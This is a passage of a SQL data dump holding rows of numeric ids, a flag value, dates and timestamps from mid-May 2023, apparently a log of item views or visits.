14:10:21'),(75593,1614,1,'2023-05-09','2023-05-09 14:28:15'),(75594,4645,1,'2023-05-09','2023-05-09 14:28:17'),(75595,2904,1,'2023-05-09','2023-05-09 14:28:41'),(75596,2904,1,'2023-05-09','2023-05-09 14:29:21'),(75597,2904,1,'2023-05-09','2023-05-09 14:29:38'),(75598,2904,1,'2023-05-09','2023-05-09 14:30:06'),(75599,1614,1,'2023-05-09','2023-05-09 14:30:13'),(75600,1718,1,'2023-05-09','2023-05-09 14:36:56'),(75601,5116,1,'2023-05-09','2023-05-09 14:42:02'),(75602,91,1,'2023-05-09','2023-05-09 14:48:44'),(75603,89,1,'2023-05-09','2023-05-09 15:30:02'),(75604,4587,1,'2023-05-09','2023-05-09 15:51:37'),(75605,1588,1,'2023-05-09','2023-05-09 15:59:12'),(75606,4651,1,'2023-05-09','2023-05-09 16:20:01'),(75607,2395,1,'2023-05-09','2023-05-09 17:26:07'),(75608,5323,1,'2023-05-09','2023-05-09 17:50:02'),(75609,1594,1,'2023-05-09','2023-05-09 18:40:25'),(75610,91,1,'2023-05-09','2023-05-09 18:42:56'),(75611,3290,1,'2023-05-09','2023-05-09 18:53:43'),(75612,2395,1,'2023-05-09','2023-05-09 18:56:07'),(75613,5163,1,'2023-05-09','2023-05-09 19:37:29'),(75614,5033,1,'2023-05-09','2023-05-09 19:38:15'),(75615,1745,1,'2023-05-09','2023-05-09 19:38:48'),(75616,3486,1,'2023-05-09','2023-05-09 19:53:33'),(75617,3058,1,'2023-05-09','2023-05-09 20:05:01'),(75618,4765,1,'2023-05-09','2023-05-09 20:53:30'),(75619,4756,1,'2023-05-09','2023-05-09 22:16:29'),(75620,4741,1,'2023-05-09','2023-05-09 22:18:54'),(75621,1608,1,'2023-05-09','2023-05-09 22:27:26'),(75622,4966,1,'2023-05-09','2023-05-09 22:40:20'),(75623,4966,1,'2023-05-10','2023-05-10 00:10:21'),(75624,4332,1,'2023-05-10','2023-05-10 02:22:23'),(75625,91,1,'2023-05-10','2023-05-10 02:22:30'),(75626,4744,1,'2023-05-10','2023-05-10 02:37:23'),(75627,4404,1,'2023-05-10','2023-05-10 03:08:56'),(75628,4768,1,'2023-05-10','2023-05-10 03:54:01'),(75629,1598,1,'2023-05-10','2023-05-10 05:14:08'),(75630,4911,1,'2023-05-10','2023-05-10 05:22:05'),(75631,5346,1,'2023-05-10','2023-05-10 07:20:56'),(75632,478,1,'2023-05-10','2023-05-10 07:39:34'),(75633,4911,1,'2023-05-10','2023-05-10 08:07:04'),(75634,1608,1,'2023-05-10','2023-05-10 09:11:25'),(75635,4520,1,'2023-05-10','2023-05-10 09:14:58'),(75636,4963,1,'2023-05-10','2023-05-10 09:57:18'),(75637,471,1,'2023-05-10','2023-05-10 10:23:36'),(75638,4966,1,'2023-05-10','2023-05-10 10:25:23'),(75639,4966,1,'2023-05-10','2023-05-10 10:30:20'),(75640,5163,1,'2023-05-10','2023-05-10 10:47:58'),(75641,5163,1,'2023-05-10','2023-05-10 11:01:23'),(75642,4412,1,'2023-05-10','2023-05-10 11:17:38'),(75643,4612,1,'2023-05-10','2023-05-10 11:18:48'),(75644,4335,1,'2023-05-10','2023-05-10 11:40:58'),(75645,1610,1,'2023-05-10','2023-05-10 11:47:38'),(75646,1774,1,'2023-05-10','2023-05-10 12:31:55'),(75647,84,1,'2023-05-10','2023-05-10 12:57:09'),(75648,3694,1,'2023-05-10','2023-05-10 13:25:57'),(75649,84,1,'2023-05-10','2023-05-10 13:26:02'),(75650,3664,1,'2023-05-10','2023-05-10 13:26:17'),(75651,5163,1,'2023-05-10','2023-05-10 13:55:03'),(75652,4966,1,'2023-05-10','2023-05-10 13:59:17'),(75653,4776,1,'2023-05-10','2023-05-10 14:05:09'),(75654,4911,1,'2023-05-10','2023-05-10 14:21:51'),(75655,76,1,'2023-05-10','2023-05-10 14:23:25'),(75656,4911,1,'2023-05-10','2023-05-10 14:24:00'),(75657,4980,1,'2023-05-10','2023-05-10 14:55:16'),(75658,4771,1,'2023-05-10','2023-05-10 15:25:36'),(75659,4996,1,'2023-05-10','2023-05-10 15:27:55'),(75660,5280,1,'2023-05-10','2023-05-10 15:38:51'),(75661,4911,1,'2023-05-10','2023-05-10 15:42:43'),(75662,1592,1,'2023-05-10','2023-05-10 16:33:04'),(75663,4582,1,'2023-05-10','2023-05-10 16:55:24'),(75664,2410,1,'2023-05-10','2023-05-10 17:03:02'),(75665,5292,1,'2023-05-10','2023-05-10 17:13:08'),(75666,4335,1,'2023-05-10','2023-05-10 17:33:04'),(75667,4966,1,'2023-05-10','2023-05-10 18:03:01'),(75668,1598,1,'2023-05-10','2023-05-10 18:44:41'),(75669,91,1,'2023-05-10','2023-05-10 18:45:40'),(75670,5071,1,'2023-05-10','2023-05-10 18:47:02'),(75671,5071,1,'2023-05-10','2023-05-10 18:47:03'),(75672,3764,1,'2023-05-10','2023-05-10 19:53:01'),(75673,4608,1,'2023-05-10','2023-05-10 21:28:45'),(75674,4944,1,'2023-05-10','2023-05-10 22:27:25'),(75675,4944,1,'2023-05-10','2023-05-10 22:35:18'),(75676,4911,1,'2023-05-10','2023-05-10 23:37:37'),(75677,4612,1,'2023-05-11','2023-05-11 00:00:12'),(75678,2809,1,'2023-05-11','2023-05-11 00:00:14'),(75679,469,1,'2023-05-11','2023-05-11 00:45:02'),(75680,1602,1,'2023-05-11','2023-05-11 01:21:45'),(75681,4612,1,'2023-05-11','2023-05-11 02:14:59'),(75682,1598,1,'2023-05-11','2023-05-11 02:48:28'),(75683,80,1,'2023-05-11','2023-05-11 02:48:35'),(75684,4753,1,'2023-05-11','2023-05-11 03:00:08'),(75685,3664,1,'2023-05-11','2023-05-11 03:24:29'),(75686,2410,1,'2023-05-11','2023-05-11 03:45:14'),(75687,4756,1,'2023-05-11','2023-05-11 04:07:40'),(75688,5346,1,'2023-05-11','2023-05-11 04:17:46'),(75689,4412,1,'2023-05-11','2023-05-11 04:53:39'),(75690,4416,1,'2023-05-11','2023-05-11 05:04:43'),(75691,2309,1,'2023-05-11','2023-05-11 05:44:48'),(75692,2911,1,'2023-05-11','2023-05-11 06:48:16'),(75693,5276,1,'2023-05-11','2023-05-11 07:16:22'),(75694,4416,1,'2023-05-11','2023-05-11 07:20:26'),(75695,4618,1,'2023-05-11','2023-05-11 07:29:08'),(75696,4612,1,'2023-05-11','2023-05-11 08:01:18'),(75697,68,1,'2023-05-11','2023-05-11 08:24:44'),(75698,1544,1,'2023-05-11','2023-05-11 08:46:07'),(75699,1718,1,'2023-05-11','2023-05-11 09:12:19'),(75700,4436,1,'2023-05-11','2023-05-11 10:16:08'),(75701,2159,1,'2023-05-11','2023-05-11 10:23:11'),(75702,5163,1,'2023-05-11','2023-05-11 10:42:55'),(75703,4771,1,'2023-05-11','2023-05-11 10:57:23'),(75704,2297,1,'2023-05-11','2023-05-11 11:34:50'),(75705,469,1,'2023-05-11','2023-05-11 12:17:12'),(75706,1608,1,'2023-05-11','2023-05-11 13:18:11'),(75707,1586,1,'2023-05-11','2023-05-11 14:24:41'),(75708,1602,1,'2023-05-11','2023-05-11 14:25:38'),(75709,91,1,'2023-05-11','2023-05-11 14:27:12'),(75710,3731,1,'2023-05-11','2023-05-11 15:43:00'),(75711,1747,1,'2023-05-11','2023-05-11 15:45:11'),(75712,1582,1,'2023-05-11','2023-05-11 15:47:29'),(75713,3027,1,'2023-05-11','2023-05-11 16:45:44'),(75714,3764,1,'2023-05-11','2023-05-11 16:50:21'),(75715,5320,1,'2023-05-11','2023-05-11 16:50:53'),(75716,4412,1,'2023-05-11','2023-05-11 17:02:31'),(75717,4412,1,'2023-05-11','2023-05-11 17:03:51'),(75718,2971,1,'2023-05-11','2023-05-11 17:13:22'),(75719,4412,1,'2023-05-11','2023-05-11 17:55:32'),(75720,1747,1,'2023-05-11','2023-05-11 18:00:08'),(75721,4301,1,'2023-05-11','2023-05-11 18:17:30'),(75722,2971,1,'2023-05-11','2023-05-11 18:34:55'),(75723,4301,1,'2023-05-11','2023-05-11 19:07:18'),(75724,3764,1,'2023-05-11','2023-05-11 19:09:48'),(75725,5256,1,'2023-05-11','2023-05-11 20:44:40'),(75726,1594,1,'2023-05-11','2023-05-11 21:46:01'),(75727,3285,1,'2023-05-11','2023-05-11 21:52:29'),(75728,4301,1,'2023-05-11','2023-05-11 21:57:30'),(75729,4938,1,'2023-05-11','2023-05-11 22:02:38'),(75730,1718,1,'2023-05-11','2023-05-11 22:18:00'),(75731,3285,1,'2023-05-11','2023-05-11 22:47:23'),(75732,1612,1,'2023-05-11','2023-05-11 23:05:26'),(75733,4963,1,'2023-05-11','2023-05-11 23:13:01'),(75734,1602,1,'2023-05-12','2023-05-12 00:29:26'),(75735,4762,1,'2023-05-12','2023-05-12 03:11:10'),(75736,3004,1,'2023-05-12','2023-05-12 03:27:10'),(75737,3498,1,'2023-05-12','2023-05-12 03:33:44'),(75738,3023,1,'2023-05-12','2023-05-12 03:55:46'),(75739,4960,1,'2023-05-12','2023-05-12 04:02:37'),(75740,68,1,'2023-05-12','2023-05-12 04:03:04'),(75741,1604,1,'2023-05-12','2023-05-12 04:08:47'),(75742,4960,1,'2023-05-12','2023-05-12 04:49:41'),(75743,4703,1,'2023-05-12','2023-05-12 05:09:54'),(75744,1596,1,'2023-05-12','2023-05-12 05:21:10'),(75745,91,1,'2023-05-12','2023-05-12 05:26:22'),(75746,1610,1,'2023-05-12','2023-05-12 05:48:40'),(75747,1596,1,'2023-05-12','2023-05-12 06:09:44'),(75748,91,1,'2023-05-12','2023-05-12 08:26:02'),(75749,89,1,'2023-05-12','2023-05-12 09:43:12'),(75750,1728,1,'2023-05-12','2023-05-12 10:41:40'),(75751,5307,1,'2023-05-12','2023-05-12 11:31:14'),(75752,3285,1,'2023-05-12','2023-05-12 11:59:13'),(75753,5307,1,'2023-05-12','2023-05-12 12:16:12'),(75754,4719,1,'2023-05-12','2023-05-12 12:43:11'),(75755,335,1,'2023-05-12','2023-05-12 13:01:13'),(75756,4911,1,'2023-05-12','2023-05-12 13:11:00'),(75757,2904,1,'2023-05-12','2023-05-12 13:11:29'),(75758,4911,1,'2023-05-12','2023-05-12 13:11:31'),(75759,4238,1,'2023-05-12','2023-05-12 13:43:39'),(75760,4238,1,'2023-05-12','2023-05-12 13:45:27'),(75761,1749,1,'2023-05-12','2023-05-12 13:46:12'),(75762,4911,1,'2023-05-12','2023-05-12 14:05:18'),(75763,1606,1,'2023-05-12','2023-05-12 14:20:14'),(75764,4911,1,'2023-05-12','2023-05-12 14:33:39'),(75765,4654,1,'2023-05-12','2023-05-12 14:35:17'),(75766,5276,1,'2023-05-12','2023-05-12 14:50:14'),(75767,1584,1,'2023-05-12','2023-05-12 15:41:08'),(75768,3285,1,'2023-05-12','2023-05-12 15:43:12'),(75769,4238,1,'2023-05-12','2023-05-12 15:50:34'),(75770,4944,1,'2023-05-12','2023-05-12 16:11:02'),(75771,4657,1,'2023-05-12','2023-05-12 16:13:09'),(75772,4768,1,'2023-05-12','2023-05-12 16:52:20'),(75773,2159,1,'2023-05-12','2023-05-12 18:01:16'),(75774,4963,1,'2023-05-12','2023-05-12 18:01:20'),(75775,4529,1,'2023-05-12','2023-05-12 18:18:31'),(75776,1544,1,'2023-05-12','2023-05-12 18:53:02'),(75777,5157,1,'2023-05-12','2023-05-12 19:24:33'),(75778,4654,1,'2023-05-12','2023-05-12 19:40:07'),(75779,4911,1,'2023-05-12','2023-05-12 20:41:13'),(75780,4759,1,'2023-05-12','2023-05-12 20:44:16'),(75781,4323,1,'2023-05-12','2023-05-12 21:17:07'),(75782,2911,1,'2023-05-12','2023-05-12 21:29:16'),(75783,2904,1,'2023-05-12','2023-05-12 21:54:58'),(75784,5128,1,'2023-05-13','2023-05-13 00:03:18'),(75785,2769,1,'2023-05-13','2023-05-13 00:34:42'),(75786,5128,1,'2023-05-13','2023-05-13 02:32:16'),(75787,2658,1,'2023-05-13','2023-05-13 03:47:52'),(75788,1582,1,'2023-05-13','2023-05-13 03:59:26'),(75789,4301,1,'2023-05-13','2023-05-13 04:43:25'),(75790,4660,1,'2023-05-13','2023-05-13 04:48:28'),(75791,68,1,'2023-05-13','2023-05-13 05:27:45'),(75792,1582,1,'2023-05-13','2023-05-13 05:33:32'),(75793,1715,1,'2023-05-13','2023-05-13 05:56:23'),(75794,4651,1,'2023-05-13','2023-05-13 06:16:36'),(75795,4651,1,'2023-05-13','2023-05-13 06:22:17'),(75796,5128,1,'2023-05-13','2023-05-13 06:57:25'),(75797,4911,1,'2023-05-13','2023-05-13 07:37:49'),(75798,4759,1,'2023-05-13','2023-05-13 07:56:48'),(75799,3781,1,'2023-05-13','2023-05-13 08:40:27'),(75800,3764,1,'2023-05-13','2023-05-13 09:04:24'),(75801,4911,1,'2023-05-13','2023-05-13 09:18:21'),(75802,4645,1,'2023-05-13','2023-05-13 09:34:55'),(75803,4645,1,'2023-05-13','2023-05-13 09:56:04'),(75804,2775,1,'2023-05-13','2023-05-13 10:14:04'),(75805,5028,1,'2023-05-13','2023-05-13 10:58:36'),(75806,1614,1,'2023-05-13','2023-05-13 11:05:59'),(75807,4420,1,'2023-05-13','2023-05-13 11:20:14'),(75808,4654,1,'2023-05-13','2023-05-13 11:57:04'),(75809,4651,1,'2023-05-13','2023-05-13 12:20:28'),(75810,80,1,'2023-05-13','2023-05-13 12:26:35'),(75811,68,1,'2023-05-13','2023-05-13 12:26:37'),(75812,1614,1,'2023-05-13','2023-05-13 12:35:57'),(75813,4977,1,'2023-05-13','2023-05-13 12:48:13'),(75814,1582,1,'2023-05-13','2023-05-13 13:21:00'),(75815,473,1,'2023-05-13','2023-05-13 13:42:18'),(75816,473,1,'2023-05-13','2023-05-13 13:43:06'),(75817,3735,1,'2023-05-13','2023-05-13 14:05:14'),(75818,1600,1,'2023-05-13','2023-05-13 14:05:57'),(75819,5320,1,'2023-05-13','2023-05-13 14:29:58'),(75820,5320,1,'2023-05-13','2023-05-13 14:31:25'),(75821,4944,1,'2023-05-13','2023-05-13 14:37:45'),(75822,4412,1,'2023-05-13','2023-05-13 14:50:59'),(75823,3034,1,'2023-05-13','2023-05-13 15:00:39'),(75824,1582,1,'2023-05-13','2023-05-13 15:01:10'),(75825,3004,1,'2023-05-13','2023-05-13 15:01:11'),(75826,3781,1,'2023-05-13','2023-05-13 15:16:20'),(75827,3781,1,'2023-05-13','2023-05-13 15:17:24'),(75828,3764,1,'2023-05-13','2023-05-13 15:25:32'),(75829,4654,1,'2023-05-13','2023-05-13 16:13:59'),(75830,3226,1,'2023-05-13','2023-05-13 16:39:26'),(75831,1596,1,'2023-05-13','2023-05-13 16:54:45'),(75832,3226,1,'2023-05-13','2023-05-13 17:07:29'),(75833,1766,1,'2023-05-13','2023-05-13 17:13:37'),(75834,4448,1,'2023-05-13','2023-05-13 18:04:24'),(75835,3034,1,'2023-05-13','2023-05-13 18:32:58'),(75836,1596,1,'2023-05-13','2023-05-13 19:54:32'),(75837,335,1,'2023-05-13','2023-05-13 19:55:40'),(75838,4238,1,'2023-05-13','2023-05-13 20:15:00'),(75839,4938,1,'2023-05-13','2023-05-13 20:40:59'),(75840,4542,1,'2023-05-13','2023-05-13 20:46:09'),(75841,4977,1,'2023-05-13','2023-05-13 21:00:05'),(75842,3229,1,'2023-05-13','2023-05-13 21:25:42'),(75843,4963,1,'2023-05-13','2023-05-13 22:40:44'),(75844,4963,1,'2023-05-13','2023-05-13 22:41:00'),(75845,4960,1,'2023-05-13','2023-05-13 23:27:44'),(75846,89,1,'2023-05-13','2023-05-13 23:30:53'),(75847,4966,1,'2023-05-14','2023-05-14 00:14:30'),(75848,4391,1,'2023-05-14','2023-05-14 00:30:53'),(75849,5163,1,'2023-05-14','2023-05-14 00:57:32'),(75850,89,1,'2023-05-14','2023-05-14 01:17:49'),(75851,3079,1,'2023-05-14','2023-05-14 01:42:25'),(75852,4685,1,'2023-05-14','2023-05-14 02:12:24'),(75853,3313,1,'2023-05-14','2023-05-14 02:12:27'),(75854,1737,1,'2023-05-14','2023-05-14 02:18:50'),(75855,3079,1,'2023-05-14','2023-05-14 02:38:11'),(75856,3030,1,'2023-05-14','2023-05-14 03:16:20'),(75857,4420,1,'2023-05-14','2023-05-14 03:42:01'),(75858,80,1,'2023-05-14','2023-05-14 03:42:30'),(75859,4420,1,'2023-05-14','2023-05-14 03:55:02'),(75860,3735,1,'2023-05-14','2023-05-14 04:07:48'),(75861,469,1,'2023-05-14','2023-05-14 04:20:42'),(75862,3498,1,'2023-05-14','2023-05-14 04:44:06'),(75863,3023,1,'2023-05-14','2023-05-14 04:49:28'),(75864,4420,1,'2023-05-14','2023-05-14 05:28:08'),(75865,4966,1,'2023-05-14','2023-05-14 05:28:11'),(75866,5062,1,'2023-05-14','2023-05-14 05:51:28'),(75867,3124,1,'2023-05-14','2023-05-14 06:33:13'),(75868,470,1,'2023-05-14','2023-05-14 07:40:46'),(75869,2609,1,'2023-05-14','2023-05-14 08:03:13'),(75870,470,1,'2023-05-14','2023-05-14 08:39:48'),(75871,1604,1,'2023-05-14','2023-05-14 09:58:08'),(75872,4944,1,'2023-05-14','2023-05-14 12:31:52'),(75873,1588,1,'2023-05-14','2023-05-14 12:35:23'),(75874,1592,1,'2023-05-14','2023-05-14 13:06:38'),(75875,5033,1,'2023-05-14','2023-05-14 13:24:13'),(75876,4950,1,'2023-05-14','2023-05-14 13:37:37'),(75877,4323,1,'2023-05-14','2023-05-14 14:25:59'),(75878,5140,1,'2023-05-14','2023-05-14 14:35:18'),(75879,76,1,'2023-05-14','2023-05-14 14:45:13'),(75880,3749,1,'2023-05-14','2023-05-14 14:58:06'),(75881,1588,1,'2023-05-14','2023-05-14 15:36:44'),(75882,91,1,'2023-05-14','2023-05-14 15:49:40'),(75883,1586,1,'2023-05-14','2023-05-14 16:02:59'),(75884,470,1,'2023-05-14','2023-05-14 16:08:11'),(75885,1610,1,'2023-05-14','2023-05-14 16:52:23'),(75886,89,1,'2023-05-14','2023-05-14 16:54:56'),(75887,4323,1,'2023-05-14','2023-05-14 17:10:18'),(75888,68,1,'2023-05-14','2023-05-14 17:25:53'),(75889,1722,1,'2023-05-14','2023-05-14 17:37:28'),(75890,89,1,'2023-05-14','2023-05-14 17:49:46'),(75891,4776,1,'2023-05-14','2023-05-14 18:25:05'),(75892,1582,1,'2023-05-14','2023-05-14 18:45:58'),(75893,1594,1,'2023-05-14','2023-05-14 18:51:45'),(75894,4551,1,'2023-05-14','2023-05-14 19:06:48'),(75895,4944,1,'2023-05-14','2023-05-14 19:19:18'),(75896,1600,1,'2023-05-14','2023-05-14 19:48:22'),(75897,467,1,'2023-05-14','2023-05-14 19:52:29'),(75898,4874,1,'2023-05-14','2023-05-14 19:56:32'),(75899,3261,1,'2023-05-14','2023-05-14 20:45:36'),(75900,1582,1,'2023-05-14','2023-05-14 22:10:17'),(75901,5334,1,'2023-05-14','2023-05-14 23:03:42'),(75902,4363,1,'2023-05-14','2023-05-14 23:45:21'),(75903,1588,1,'2023-05-15','2023-05-15 00:01:05'),(75904,1602,1,'2023-05-15','2023-05-15 01:51:47'),(75905,1770,1,'2023-05-15','2023-05-15 02:30:56'),(75906,3691,1,'2023-05-15','2023-05-15 02:54:41'),(75907,4326,1,'2023-05-15','2023-05-15 03:20:24'),(75908,4420,1,'2023-05-15','2023-05-15 03:45:05'),(75909,4648,1,'2023-05-15','2023-05-15 03:57:46'),(75910,1770,1,'2023-05-15','2023-05-15 04:10:15'),(75911,4420,1,'2023-05-15','2023-05-15 04:31:25'),(75912,3746,1,'2023-05-15','2023-05-15 04:52:12'),(75913,1602,1,'2023-05-15','2023-05-15 05:09:48'),(75914,4911,1,'2023-05-15','2023-05-15 05:26:21'),(75915,1602,1,'2023-05-15','2023-05-15 05:34:09'),(75916,1596,1,'2023-05-15','2023-05-15 06:27:32'),(75917,2751,1,'2023-05-15','2023-05-15 06:53:27'),(75918,5334,1,'2023-05-15','2023-05-15 08:01:31'),(75919,4911,1,'2023-05-15','2023-05-15 08:38:27'),(75920,4911,1,'2023-05-15','2023-05-15 08:38:56'),(75921,4454,1,'2023-05-15','2023-05-15 09:03:45'),(75922,1604,1,'2023-05-15','2023-05-15 10:04:55'),(75923,1588,1,'2023-05-15','2023-05-15 10:15:29'),(75924,1592,1,'2023-05-15','2023-05-15 10:45:01'),(75925,89,1,'2023-05-15','2023-05-15 11:07:05'),(75926,1604,1,'2023-05-15','2023-05-15 11:27:45'),(75927,4911,1,'2023-05-15','2023-05-15 11:37:00'),(75928,4391,1,'2023-05-15','2023-05-15 12:11:07'),(75929,4416,1,'2023-05-15','2023-05-15 12:15:05'),(75930,4960,1,'2023-05-15','2023-05-15 12:21:43'),(75931,89,1,'2023-05-15','2023-05-15 12:29:42'),(75932,1600,1,'2023-05-15','2023-05-15 12:30:29'),(75933,89,1,'2023-05-15','2023-05-15 12:30:34'),(75934,1600,1,'2023-05-15','2023-05-15 12:31:47'),(75935,89,1,'2023-05-15','2023-05-15 12:32:22'),(75936,89,1,'2023-05-15','2023-05-15 12:32:28'),(75937,5320,1,'2023-05-15','2023-05-15 12:32:34'),(75938,1610,1,'2023-05-15','2023-05-15 12:33:33'),(75939,89,1,'2023-05-15','2023-05-15 12:33:46'),(75940,1582,1,'2023-05-15','2023-05-15 12:33:49'),(75941,89,1,'2023-05-15','2023-05-15 12:34:08'),(75942,89,1,'2023-05-15','2023-05-15 12:34:12'),(75943,1544,1,'2023-05-15','2023-05-15 12:34:36'),(75944,5163,1,'2023-05-15','2023-05-15 12:35:12'),(75945,80,1,'2023-05-15','2023-05-15 14:07:26'),(75946,1602,1,'2023-05-15','2023-05-15 14:20:12'),(75947,3096,1,'2023-05-15','2023-05-15 14:55:50'),(75948,3092,1,'2023-05-15','2023-05-15 14:58:28'),(75949,4323,1,'2023-05-15','2023-05-15 15:05:13'),(75950,4930,1,'2023-05-15','2023-05-15 17:06:21'),(75951,108,1,'2023-05-15','2023-05-15 17:07:17'),(75952,4341,1,'2023-05-15','2023-05-15 17:52:29'),(75953,4911,1,'2023-05-15','2023-05-15 17:53:23'),(75954,80,1,'2023-05-15','2023-05-15 18:15:38'),(75955,3691,1,'2023-05-15','2023-05-15 19:06:39'),(75956,4663,1,'2023-05-15','2023-05-15 19:43:15'),(75957,5276,1,'2023-05-15','2023-05-15 19:44:41'),(75958,4911,1,'2023-05-15','2023-05-15 19:53:23'),(75959,5276,1,'2023-05-15','2023-05-15 19:54:29'),(75960,5276,1,'2023-05-15','2023-05-15 20:01:48'),(75961,4657,1,'2023-05-15','2023-05-15 21:14:40'),(75962,4657,1,'2023-05-15','2023-05-15 21:14:42'),(75963,3731,1,'2023-05-15','2023-05-15 21:56:13'),(75964,1586,1,'2023-05-15','2023-05-15 22:38:14'),(75965,4391,1,'2023-05-15','2023-05-15 23:18:30'),(75966,4648,1,'2023-05-16','2023-05-16 00:09:43'),(75967,4648,1,'2023-05-16','2023-05-16 00:09:45'),(75968,5058,1,'2023-05-16','2023-05-16 00:21:41'),(75969,4963,1,'2023-05-16','2023-05-16 00:22:45'),(75970,91,1,'2023-05-16','2023-05-16 00:23:34'),(75971,4963,1,'2023-05-16','2023-05-16 00:27:37'),(75972,4660,1,'2023-05-16','2023-05-16 00:54:43'),(75973,4930,1,'2023-05-16','2023-05-16 01:02:00'),(75974,4663,1,'2023-05-16','2023-05-16 01:44:40'),(75975,4663,1,'2023-05-16','2023-05-16 01:44:42'),(75976,2769,1,'2023-05-16','2023-05-16 02:30:41'),(75977,3092,1,'2023-05-16','2023-05-16 03:26:26'),(75978,3691,1,'2023-05-16','2023-05-16 03:39:28'),(75979,1728,1,'2023-05-16','2023-05-16 03:46:57'),(75980,5080,1,'2023-05-16','2023-05-16 03:50:01'),(75981,3691,1,'2023-05-16','2023-05-16 04:20:33'),(75982,4520,1,'2023-05-16','2023-05-16 04:33:43'),(75983,5037,1,'2023-05-16','2023-05-16 04:39:20'),(75984,3691,1,'2023-05-16','2023-05-16 05:02:39'),(75985,1544,1,'2023-05-16','2023-05-16 05:29:44'),(75986,1749,1,'2023-05-16','2023-05-16 06:14:44'),(75987,68,1,'2023-05-16','2023-05-16 08:38:08'),(75988,89,1,'2023-05-16','2023-05-16 08:56:24'),(75989,3731,1,'2023-05-16','2023-05-16 09:00:47'),(75990,1877,1,'2023-05-16','2023-05-16 09:23:17'),(75991,4412,1,'2023-05-16','2023-05-16 09:45:47'),(75992,1612,1,'2023-05-16','2023-05-16 10:08:18'),(75993,1774,1,'2023-05-16','2023-05-16 11:33:32'),(75994,1612,1,'2023-05-16','2023-05-16 11:37:14'),(75995,4911,1,'2023-05-16','2023-05-16 11:57:51'),(75996,91,1,'2023-05-16','2023-05-16 11:58:28'),(75997,4930,1,'2023-05-16','2023-05-16 11:59:03'),(75998,91,1,'2023-05-16','2023-05-16 11:59:16'),(75999,4911,1,'2023-05-16','2023-05-16 11:59:20'),(76000,1612,1,'2023-05-16','2023-05-16 12:01:25'),(76001,80,1,'2023-05-16','2023-05-16 12:07:10'),(76002,1612,1,'2023-05-16','2023-05-16 12:10:12'),(76003,1745,1,'2023-05-16','2023-05-16 13:05:35'),(76004,1586,1,'2023-05-16','2023-05-16 13:40:06'),(76005,1596,1,'2023-05-16','2023-05-16 13:52:12'),(76006,5264,1,'2023-05-16','2023-05-16 14:37:32'),(76007,5001,1,'2023-05-16','2023-05-16 14:48:40'),(76008,4938,1,'2023-05-16','2023-05-16 15:02:00'),(76009,2769,1,'2023-05-16','2023-05-16 15:14:10'),(76010,5264,1,'2023-05-16','2023-05-16 15:55:11'),(76011,5163,1,'2023-05-16','2023-05-16 16:05:27'),(76012,5163,1,'2023-05-16','2023-05-16 16:09:31'),(76013,5163,1,'2023-05-16','2023-05-16 16:11:06'),(76014,5054,1,'2023-05-16','2023-05-16 16:51:52'),(76015,68,1,'2023-05-16','2023-05-16 16:55:32'),(76016,68,1,'2023-05-16','2023-05-16 16:55:38'),(76017,4911,1,'2023-05-16','2023-05-16 18:10:07'),(76018,1614,1,'2023-05-16','2023-05-16 18:54:10'),(76019,72,1,'2023-05-16','2023-05-16 18:56:08'),(76020,3240,1,'2023-05-16','2023-05-16 19:44:55'),(76021,4768,1,'2023-05-16','2023-05-16 19:52:42'),(76022,2159,1,'2023-05-16','2023-05-16 19:52:48'),(76023,1602,1,'2023-05-16','2023-05-16 20:10:13'),(76024,4911,1,'2023-05-16','2023-05-16 20:18:41'),(76025,4657,1,'2023-05-16','2023-05-16 20:27:43'),(76026,2309,1,'2023-05-16','2023-05-16 20:54:54'),(76027,1728,1,'2023-05-16','2023-05-16 21:49:08'),(76028,1602,1,'2023-05-16','2023-05-16 21:54:31'),(76029,89,1,'2023-05-16','2023-05-16 23:06:13'),(76030,1586,1,'2023-05-16','2023-05-16 23:34:12'),(76031,76,1,'2023-05-17','2023-05-17 03:11:34'),(76032,3090,1,'2023-05-17','2023-05-17 03:37:34'),(76033,5128,1,'2023-05-17','2023-05-17 03:54:58'),(76034,5058,1,'2023-05-17','2023-05-17 04:22:36'),(76035,2617,1,'2023-05-17','2023-05-17 04:53:36'),(76036,1728,1,'2023-05-17','2023-05-17 05:05:56'),(76037,4980,1,'2023-05-17','2023-05-17 05:13:18'),(76038,84,1,'2023-05-17','2023-05-17 06:07:40'),(76039,5033,1,'2023-05-17','2023-05-17 06:43:52'),(76040,5276,1,'2023-05-17','2023-05-17 07:43:20'),(76041,2309,1,'2023-05-17','2023-05-17 08:25:07'),(76042,1586,1,'2023-05-17','2023-05-17 09:06:47'),(76043,5163,1,'2023-05-17','2023-05-17 09:22:19'),(76044,1604,1,'2023-05-17','2023-05-17 10:28:42'),(76045,5163,1,'2023-05-17','2023-05-17 10:31:59'),(76046,5163,1,'2023-05-17','2023-05-17 10:37:35'),(76047,1544,1,'2023-05-17','2023-05-17 10:54:41'),(76048,1544,1,'2023-05-17','2023-05-17 11:02:57'),(76049,4911,1,'2023-05-17','2023-05-17 12:46:14'),(76050,4911,1,'2023-05-17','2023-05-17 13:26:48'),(76051,473,1,'2023-05-17','2023-05-17 13:30:27'),(76052,4911,1,'2023-05-17','2023-05-17 13:30:35'),(76053,5276,1,'2023-05-17','2023-05-17 14:25:33'),(76054,89,1,'2023-05-17','2023-05-17 15:07:07'),(76055,1544,1,'2023-05-17','2023-05-17 15:29:00'),(76056,469,1,'2023-05-17','2023-05-17 15:34:01'),(76057,4960,1,'2023-05-17','2023-05-17 15:35:36'),(76058,68,1,'2023-05-17','2023-05-17 15:48:36'),(76059,80,1,'2023-05-17','2023-05-17 16:23:56'),(76060,1598,1,'2023-05-17','2023-05-17 16:29:15'),(76061,1604,1,'2023-05-17','2023-05-17 16:30:23'),(76062,4660,1,'2023-05-17','2023-05-17 16:47:34'),(76063,3746,1,'2023-05-17','2023-05-17 18:03:28'),(76064,4660,1,'2023-05-17','2023-05-17 18:13:16'),(76065,1596,1,'2023-05-17','2023-05-17 18:14:02'),(76066,4582,1,'2023-05-17','2023-05-17 19:58:53'),(76067,4582,1,'2023-05-17','2023-05-17 20:06:35'),(76068,1604,1,'2023-05-17','2023-05-17 21:22:22'),(76069,3746,1,'2023-05-17','2023-05-17 22:05:58'),(76070,1586,1,'2023-05-17','2023-05-17 22:11:49'),(76071,4963,1,'2023-05-17','2023-05-17 22:37:16'),(76072,5264,1,'2023-05-17','2023-05-17 22:45:49'),(76073,4663,1,'2023-05-17','2023-05-17 23:35:26'),(76074,5264,1,'2023-05-18','2023-05-18 00:17:03'),(76075,2769,1,'2023-05-18','2023-05-18 00:58:41'),(76076,4387,1,'2023-05-18','2023-05-18 01:19:41'),(76077,80,1,'2023-05-18','2023-05-18 02:20:46'),(76078,80,1,'2023-05-18','2023-05-18 